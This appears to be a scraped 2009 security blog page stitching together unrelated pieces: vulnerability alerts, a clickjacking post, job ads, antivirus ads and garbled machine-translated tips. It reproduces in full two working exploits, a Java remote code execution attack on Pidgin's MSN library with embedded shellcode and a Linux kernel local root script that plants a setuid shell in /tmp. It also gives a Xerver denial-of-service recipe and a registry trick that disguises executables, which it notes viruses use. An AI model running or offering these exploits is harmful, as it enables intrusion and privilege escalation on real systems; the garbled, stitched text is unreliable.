Hacker Source

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to a remote denial of service through following means.

Xerver ships with a web based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.

The admin package runs on port 32123 and does not require any form of
authentication to make changes to the server configuration.

- Bug -

If the HTTP Server port is set to any kind of letter combination, the server will
crash and be unable to be restarted unless the configuration file is manually
edited to remove the letters and put back to a number (ie. 80).

- Example -

1. http://172.16.2.101:32123/?action=wizardStep1
2. Enter anything in the port field, "Dr_IDE"
3. Click Save and Continue

- Results -

The server will crash hard, and you will be unable to restart it. You must edit the
configuration file, Xerver2.cfg and replace the first line of the file with a Port
number.

- Note -

I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone
else can figure it out.

Methods and variables of interest for this attack:

SubmitForm()
document.myForm.portNR.value="80" # default, any letters here would kill the server

source milw0rm.com

Virus writers have created an exploit for an unpatched vulnerability in Adobe Flashplayer, Acrobat and Acrobat reader. The vulnerability exists in these applications on all platforms, Windows, OS X, Linux and Solaris.

The vulnerable products are:

* Adobe Reader 9.1.2 and earlier 9.x versions
* Adobe Flash Player 9.0.159.0 and 10.0.22.87 and earlier 9.x and 10.x versions

You can read the alert from Adobe at: http://www.adobe.com/support/security/advisories/apsa09-03.html

The exploit runs with the privileges of the current user. The known virus is delivered as a PDF file which could be attached to an email or posted on a web page.

OIT has seen an instance of an infected computer sending email with .PDF attachments. The emails had a message saying the attachment was an e-card or an invoice for a recent purchase. Usual warnings apply, if you weren't expecting an email with an attachment, don't open the PDF attachment. If you don't know the sender, don't open the PDF attachment.

The malicious PDF contains flash content. In the Windows environment, if the malicious PDF is opened with an Adobe product, it will exploit the vulnerability via the flash player .dll called authplay.dll. On a Windows system, it is apparently possible to disable the connection between Acrobat and Flash by renaming that .dll and one in the same directory called rt3d.dll. This is the only workaround at this time. There are alternate PDF viewers that would not be vulnerable.

According to malware analysts, the exploit will work on Windows 9x, NT, 2K, XP, Vista, Server 2000 and Server 2003.

Adobe is working on a patch and says it will be ready for all platforms, but Solaris, on 7/30/09. So until then, use caution when opening that PDF. If you receive a PDF that crashes Acrobat, I'd like to know.

source oit.ncsu.edu

Yesterday I published a blind analysis of the so called “Clickjacking protection” included in IE8 RC1. “Blind” because, hype aside, there was no technical documentation available, even if the feature was targeted to web developers who — in order to protect their users — should modify the way their pages are served.

After a while, Microsoft’s David Ross sent me an email confirming that my wild guesses about IE8’s approach, its scope and its limitations were indeed correct. The only information obviously missing from my “prophetic” description was the real name of the “X-I-Do-Not-Want-To-Be-Framed-Across-Domains” HTTP header to be sent before the sensible pages, and today this little mystery has been finally unveiled by Eric Lawrence on the IE Blog:

Web developers can send a HTTP response header named X-FRAME-OPTIONS with HTML pages to restrict how the page may be framed. If the X-FRAME-OPTIONS value contains the token DENY, IE8 will prevent the page from rendering if it will be contained within a frame. If the value contains the token SAMEORIGIN, IE will block rendering only if the origin of the top level-browsing-context is different than the origin of the content containing the X-FRAME-OPTIONS directive. For instance, if http://shop.example.com/confirm.asp contains a DENY directive, that page will not render in a subframe, no matter where the parent frame is located. In contrast, if the X-FRAME-OPTIONS directive contains the SAMEORIGIN token, the page may be framed by any page from the exact http://shop.example.com origin.

As I had anticipated, IE8’s “clickjacking protection” is just an alternate scriptless way to perform frame busting, a well known and simple technique to prevent a page from being “framed” in another page and therefore becoming an easy UI Redressing target. Microsoft had to follow its own special path because the traditional JavaScript implementation can be easily circumvented on IE, e.g. by loading the targeted page inside an IFRAME SECURITY=restricted element. But the other major browsers are equally “protected” (if we can call “browser protection” something relying on the good will and education of web authors) by “standard” frame busting. Therefore, slogans like “the first browser to counter this type of threat” (James Pratt, Microsoft senior product manager) were marketspeak at its best. Furthermore, this approach is useless against Clickjacking in its original “historical” meaning, i.e. those attacks involving Flash applets and other kinds of plugin embeddings which led Robert “RSnake” Hansen and Jeremiah Grossman to invent the successful buzzword.

However in my post I had also written that having such a scriptless alternative as a cross-browser option would be nice:

I do believe that a declarative approach to control subdocument requests is an excellent idea: otherwise I wouldn’t have included the SUB pseudo-method in ABE Rules Specification (pdf). Moreover, as soon as I’ve got some less blurry info (David Ross, I know you’re listening, why don’t you drop me a line?), I’ll be happy to immediately implement a compatible feature in NoScript and lobby Mozilla for inclusion in Firefox 3.1.

David kindly answered

I think this would be fantastic and it’s a great place to start building some bridges.

I agree, in facts I’ve filed an enhancement request for Firefox, and I’m already working to release a NoScript development build featuring X-FRAME-OPTIONS support: that’s relatively easy, since I can hook in the work I’m already doing for the ABE module. (Update 2009-29-01: I just released NoScript 1.8.9.9 development build, featuring full experimental X-FRAME-OPTIONS compatibility support).
It’s worth noticing, though, that this is just a cross-browser compatibility effort: neither Firefox nor NoScript really need this feature. Traditional JavaScript-based frame busting works fine in Firefox, giving it the same degree of (modest) “protection” as IE8. NoScript users, on the other hand, are already fully protected, because ClearClick is the one and only countermeasure which works against any type of Clickjacking (frame or embed based), no matter if web sites cooperate or not.

Speaking of NoScript, I’ve got a small but important correction to the otherwise excellent article Robert McMillan wrote for PC World (IDG News) yesterday:

Because clickjacking requires scripting, the attack doesn’t work when NoScript is enabled.

This statement is wrong twice:

1. Clickjacking does not require scripting: JavaScript might make the attacker’s life easier, but it’s not indispensable to throw an attack.
2. NoScript does not need scripting to be disabled in order to protect its users against Clickjacking: its exclusive ClearClick anti-Clickjacking technology works independently from script blocking.

That’s why NoScript can be recommended to anyone, even to grandma who’s not inclined to block JavaScript: albeit I do not encourage using NoScript’s “Allow Scripts Globally” command because the default deny policy is your best first-line defense, many additional protection features such as Anti-XSS filters and ClearClick still remain active even when JavaScript is enabled, providing the safest web experience available in any browser.

source hackademix.net

Pidgin MSN <= 2.5.8 Remote Code Execution

Pierre Nogues - pierz@hotmail.it
http://www.indahax.com/

Description:
Pidgin is a multi-protocol Instant Messenger.

This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
which could lead to memory corruption.

Affected versions :
Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.

Plateforms :
Windows, Linux, Mac

Fix :
Fixed in Pidgin 2.5.9
Update to the latest version : http://www.pidgin.im/download/

References :
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
[2] http://www.coresecurity.com/content/libpurple-arbitrary-write
[3] http://www.pidgin.im/news/security/?id=34

Usage :
You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
download source code, click here

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

private MsnMessenger messenger;
private String login;
private String password;
private String target;

private int session_id = NumberUtils.getIntRandom();

private byte shellcode[] = new byte[] {

/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};

// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8

private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;

public static void main(String[] args) throws Exception {

if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}

}

public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;

neweip = reteip - shellcode.length ;

for(int i=0;i payload[i] = shellcode[i];

payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}

public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);

initMessenger(messenger);
messenger.login();
}

protected void initMessenger(MsnMessenger messenger) {

messenger.addContactListListener(new MsnContactListAdapter() {

public void contactListInitCompleted(MsnMessenger messenger) {

final Object id = new Object();

messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

public void switchboardStarted(MsnSwitchboard switchboard) {

if (id != switchboard.getAttachment())
return;

switchboard.inviteContact(Email.parseStr(target));
}

public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);

// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);

msg.setP2PDest(target);

switchboard.sendMessage(msg);

System.out.println("First packet sent, waiting for the ACK");

}

public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}

public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});

messenger.addMessageListener(new MsnMessageAdapter(){

public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();

MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);

switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");

}
});



messenger.addMessengerListener(new MsnMessengerAdapter() {

public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}

public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}

public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});

}
}

// Original source milw0rm.com [2009-09-09]

Need more Computer and Internet security click here

Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work. Download, click here

sources. technet.microsoft.com

Koobface, the Facebook worm that takes over computers by spreading through the social network, is back in a new form. The newly tweaked Facebook worm works like its predecessor, only with an updated look and code that might not be caught as quickly.
Facebook Worm 2.0

Koobface tricks you into following a link that looks like it’s from a friend. It’ll usually look like a link to a video of someone you know. Once you open the link, though, you’ll be told you need to download an update to your video player. That update is actually the Facebook worm threat in disguise.

The new variant, discovered by researchers at Trend Micro, poses as a YouTube page. It’ll even display your name and photo from Facebook to give a nonthreatening appearance to unsuspecting users.


Facebook-Aided Virus Spread

Once you agree to install the software it offers, the Koobface worm will take over your computer and hijack your Facebook account. It’ll then live up to its Facebook virus reputation by sending messages to your friends and attempting to infect them.

“It also sends and receives information from an infected machine by connecting to several servers,” says Trend Micro’s Rik Ferguson. “This allows hackers to execute commands on the affected machine.”

The new Koobface virus has also been detected on several other social networks, including MySpace, Bebo, Friendster, Hi5, and Live Journal.
Koobface Protection

Keeping yourself safe from Koobface is simple: Be very cautious of what you click. Even if something appears to have come from a friend, remember that their account could be infected and the message may not actually be from them. Make sure you know where you’re going before you click.

Once you do follow a link, never install software updates directly from that page. If you receive a notice that you need an update for your Adobe Flash player, navigate directly to adobe.com and look for the update at the original source. That’s the safest way to know you’re getting the real deal, and not a Facebook worm in disguise.

source facebook-worm-koobface/

FIXES
Notepad++ v5.4.5 fixed bugs (from v5.4.4)
1. Fix plugins shortcuts not working bug.
2. Fix the tooltip on toolbar display bug for the plugins icons.
3. Fix a crash that was occurring when searching in files from a deep path.
4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.
5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).
6. Add SQL folding capacity.

source milw0rm.com

download source code, click here

PCMAV Valkyrie Antivirus, PCMAV 2.0c Download
PCMAV Valkyrie Antivirus, PCMAV 2.0b Download
Remover Sality antivirus, download

For another antivirus solution, click here

STOP TALKING, START DOING!
IBM has always delivered technology innovation to our customers. Now, we partner with them in their business and help them become special company, and to stay special. To make our customers special, we need people who are above the ordinary.
IBM Indonesia recruits best-in-class professionals to deliver best breed of IT Solutions and Services to customers.
Do you have the confidence? Do you have the enthusiasm? Do you have the insights to partner with customers and deliver solutions and have significant positive impact on their business?

SENIOR SERVICES SALES – FINANCIAL SECTOR

(POSITION CODE: GTS-0240897)

Responsibilities:

* Facilitate effort for opportunity identification, applies sales skills to engage and close opportunities with key decision makers.
* Responsible for sales results for the selected solution with the assigned territory.
* Understand competition and develops appropriate sales strategy.
* Maintains deep technical skills of IBM products and working knowledge of other services product portfolio, as well as basic understanding of Infrastructure Solution.
Desired Candidate:

* Minimum of Bachelor Degree from any background.
* Experience in I/T industry in Sales / Account Manager for minimum 5 years.
* Working experience in handling financial sector.
* High drive towards achievement.
* Proficient level for English and Bahasa Indonesia, both written and spoken.

Submit your application through ibm.com/employment/id, at the latest by August 15th, 2009. Search for the position code and apply through IBM career portal.

Only short listed candidates will be contacted.


source. jobsdb.com

PT InMarc Indonesia is a fast Growing Marketing Agency. We have strong fundamental business in Indonesian Major IT Industries supporting worldwide brand such as Microsoft, Dell and Hewlett Packard. We are looking for the following candidates for our expansion:
Professional Sales Executive for IT Products (SALES)

Available Position: 10
Work location: Jakarta
Level of education: Min. D3 in Any Major
Work experience: 2 Years, Fresh Graduates are encouraged to Apply but commitment is required.
Gender: Male / Female
Marital Status: Single
Age: 23 – 30 years old


General Requirements:

* Living in West or North of Jakarta
* At least 2 years of experience, Fresh Graduates are encouraged to Apply but commitment is required.
* Computer Literate is a must
* Attractive, sociable and Mature
* Pleasant personality with good communication skill
* Highly creative, self motivated, strong-drive, good analytical, hard worker and should be able to work under pressure to meet deadline or target
* Target Oriented & good team work.
* Have own vehicle (for Sales)



Please send your application letter with detailed resume/CV, stating details of qualifications and summary of experiences, present/ expected salary, and other documents support, current photograph not later than 30 May 2009 after this advertisement to:

PT InMarc Indonesia
Muara Karang Blok M9 Selatan No.71-72
Jakarta 14450
Hrd.inmarc@gmail.com

Or you can check our website on:
www.marathonrewards.com; www.hp-runner.com; www.wm-runner.com

We are sorry to inform that only short listed candidates will be notified.

Need register_globals = on and magic_quotes_gpc = off
Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713
Coppermine Photo Gallery 1.4.22 Remote Exploit

Coded by girex

source. milw0rm

download

Need computer and internet security, click here

Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing, and hackers. Best detection, fastest performance & smallest footprint. NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.

ESET solutions are built on ESET’s one-of-a-kind ThreatSense technology. This advanced heuristics engine enables proactive detection of malware not covered by even the most frequently updated signature-based products by decoding and analyzing executable code in real time, using an emulated environment. By allowing malware to execute in a secure virtual world, ESET is able to clearly differentiate between benign files and even the most sophisticated and cleverly-disguised malware.
Users of Microsoft® Windows® can experience the power and elegance of NOD32’s ThreatSense Technology with ease and comfort. Our single optimized engine offers the best protection from viruses, spyware, adware, phishing attacks, and more. Keep tomorrow’s threats at bay with our proactive detection technology.
learn more...

For another solution, click here

Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum

source. RSnake

Download Cheat Sheet, click here

hacker safe

#!/bin/sh


# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################

hacker safe



SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include
#include

int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include
#include
#include
#include
#include

int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}

int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]
hacker safe

There are some the matters require to in knowing:
Malware ( abbreviation of term English Ianguage ) malicious software, meaning the compromising software) is the computer program created for the purpose of and specific-purpose of his creator and is the program look for weakness from software. Generally malware created to leak or destroy a software or system operasi.(Wiki).

Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)

Google as search engine biggest in world wish to give the result search the cleanness and peaceful to searcher that good from side website and seo, special so for the things from side website, google besides doing crawl he/she also do scanning to website do website the contain script which including category malware/badware or don't.

In the activity google work along with stopbadware.org to give the information to:
Administrator(Suspect website) usually google will deliver the enamel to:

buse@website com
admin@website.com
administrator@website.com
contact@website.com
info@website.com *

so that you require to make one of the above enamel for precaution to catch the information in delivering by google, if website you is hit Label Malware.
They also inform to public society ( consumer Google Search), that website the contain Malware, by presenting be like this



Cause:
One of [the] process entry of malware/badware into website you can in causing by existence of virus in your computer, moment update website ( upload file php or html) that good through FTP or Browser hence virus will injection some script malware/badware into page website without you realize before all, so that when google do scanning and find script malware/badware is in website you is hence google will direct give Label Badware/Malware in SERP their.
They also inform to public society ( consumer Google Search), that website the contain Malware.

Way to overcome:

To overcome / to eliminate Label Badware/Malware in SERP Google, hence you require to do some matters is :
1. Do the sweeping script malware/badware [at] script website your
2. Ask review on the side of stopbadware.org
3. Ask review side Google

Special to poin which to 3. that is requesting review side of Google, its way is

1. You have to have account in google, can in the form of enamel in google.

2. Step into http://google.com/accounts select;choose Webmaster / Webmaster Tools
3. If the menu not shown was hence you had to enlist in google webmaster tools formerly.
4. Register website you is in google webmaster tools then do the verification / verify
5. After that verify please enter the menu Overview and click link Review site

Awaited 2 x 24 Jam, [stopbadware.org will review your website and if website you truely have clear of malware/badware hence they will contact google, then Google will do review directly.

After they express website you really clean hence Label Badware/Malware in SERP Google will soon in eliminating, usually process the abolition Label this eat the time of 1x24 [hour/clock]... patient thus yes.... :)

Comprehensive real-time protection against viruses, spyware, identity theft, poisoned web pages, and all types of malware that can threaten your valuable personal information. Prevention is better than cure! Comprehensive cyberthreat prevention for Windows-based home users from one of the World's most trusted security companies.

Features :

All-in-one protection
Antivirus and Anti-Spyware: protection against viruses, worms, spyware, and trojans
Identity Protection: helps prevent identity theft
Anti-Rootkit: protection against hidden threats (rootkits)
Web Shield: screens downloads and IM for infections
LinkScanner: blocks poisoned web pages in real time
Anti-Spam with anti-phishing: filters out unwanted and fraudulent e-mails
Firewall: blocks hacker attacks
System Tools: tailor AVG for your particular needs
Easy-to-use, automated protection

AVG Internet Security gives you maximum protection with real-time scanning, automatic updates, low-impact background scanning for online threats, and instant quarantining or removal of infected files ensures maximum protection. Every interaction between your computer and the Internet is analyzed to ensure nothing can get onto your system without your knowledge.

AVG checks in real time:
All files including documents, photos, music, and applications
E-mails (all major email programs like Microsoft Outlook and Thunderbird supported)
Instant messaging and P2P communications
File downloads and online transactions such as shopping and banking
Search results and any other web links you click on
Internet Security – prevention is better than cure

AVG Internet Security provides multiple layers of protection to ensure nothing slips through.
NEW Identity Theft Protection prevents new and unknown threats from stealing your personal information like bank and credit card details.
LinkScanner checks every link, making sure you're safe searching the internet and surfing the web, minimizing the risk of you accidentally visiting a poisoned web page.
Web Shield detects and blocks malware threats in file downloads and instant-messaging conversations.
The Firewall stops hackers from accessing and misusing your computer.
Antivirus, Anti-Spyware, and Anti-Rootkit detect and root out all manner of malicious software, no matter how stealthy it may be.

You didn't buy your computer to worry about security. So let AVG Internet Security do the worrying for you while you get on with your online life.
Tailor AVG just for you

AVG's System Tools let you easily configure your privacy settings, connections, and browser plug-ins all in one place.
The best Windows protection - trusted by millions of users

AVG's award-winning antivirus technology protects more than 80 million users and is certified by major antivirus testing organizations (VB100%, ICSA, West Coast Labs Checkmark). View all AVG awards & certifications
No hidden costs

When you purchase an AVG product, everything you need is included in the price for the full license duration - technical support, virus updates, and new program versions. All users of paid AVG products also qualify for generous discounts on subscription renewals and product upgrades.
Flexible licensing
AVG Internet Security can be purchased online in license packs for 1-10 computers.
One or two year subscriptions available. More info, click here

Such as we know windows only recognizing some file type fruits executable newly, that is the file exe, com, scr, and pif. How if we will make extension file executable newly, for example extension ext( for example his file name : Anti. ext and nature of his file be like file Anti.exe). Usefulness of this technique is so that black out the program to file exe, scr, and com can be overcome. So that if file exe be like msconfig.exe blacked out because extension exe, hence we fixed can run the program msconfig the by changing extension, for example becoming msconfig.ext

To make the matter be like this easy very, we are only require to enter key newly into registry, for example extension ext which be like file exe, hence file reg yg enterred is :


Windows Registry Editor Version 5.00
[ HKEY_CLASSES_ROOT\.EVA]
@=" exefile"

Become his format is :
Windows Registry Editor Version 5.00
[ HKEY_CLASSES_ROOT\.EKSTENSIBARU]
@=" exefile" to be like file exe
@=" scrfile" to be like file scr

Is while to be like file com, hence have to be entered also in file regi key PersistentHandler This technique can is also used by virus to system his defence in computer, that is with :

. 1. Change handling of file dangerous, for example binding file jpg exefile, whereas virus file fixed fasten ( join forces) file jpg in fact, without changing extension file, is while substitution extension for file draw jpg is extension will different, for example tmp

. 2. Incognito to become the file which similar with file undangerous so that difficult detected for example virus for file extension d11 at first sight look like with dll ekstensi etc.

Note :

To alter, for example file scr before all use the program wafting icon alone, we wish the file scr use the icon from outside, for example property windows without compiling again file scr, hence we require to changing value registry, at key :

[ HKEY_CLASSES_ROOT\SCRFILE]
that is in :
Value DefaultIcon from % 1 becoming, for example :: % Systemroot%\System32\Shell32.Dll,-154

The threat: Keyloggers as means of stealing information.

Information stealing exists since early days of the World Wide Web. Unfortunately, various kinds of white-collar crime aimed at stealing valuable (in the direct sense) information thrive in cyberspace. The scale of these crimes varies from harvesting email addresses for spammers to identity theft and espionage.

Since the Internet has become a part of daily life and business, rapid growth of cybercrime endangers the whole society. Information-stealing software certainly facilitate these crimes, sometimes being the only instrument a thief needs to commit them.

Real protection starts with identifying the threat.


One of the most effective ways of stealing information is capturing keystrokes. A small, fairly simple program (a programmer can write a plain one in a couple of days) captures everything the user is doing - keystrokes, mouse clicks, files opened and closed, sites visited. A little more sophisticated programs of this kind also capture text from windows and make screenshots (record everything displayed on the screen) - so the information is captured even if the user doesn't type anything, just opens the views the file. These programs are called Keylogging Programs (keyloggers, key loggers, keystroke loggers, key recorders, key trappers, key capture programs, etc.) They form the most dangerous core of so-called spyware.

Old keyloggers become obsolete. New keyloggers appear all the time. Existing keylogging programs are constantly modernized. It is extremely likely that several keyloggers are being written at this very moment.

Means of defense: Anti-spyware, anti-viruses and personal firewalls

Experts recommend to use a combination of three products: a personal firewall, an anti-virus and an anti-spyware - and regularly update the latter two. However, even in this case a computer won't be 100% secure against keyloggers. Why?

Most anti-spy and anti-virus products, whatever their names are and whatever their advertising says, apply the same scheme - pattern matching. These programs scan the system, looking for code that matches signatures - pieces of spyware code, which are kept in so-called signature bases. These products can protect from spyware which has already been detected and studied before. This approach makes anti-spyware developers inevitably lag behind spyware writers. Without frequent updating anti-spy products lose their efficiency very quickly. It can become very risky because the PC owner still relies on his anti-spy or anti-virus.

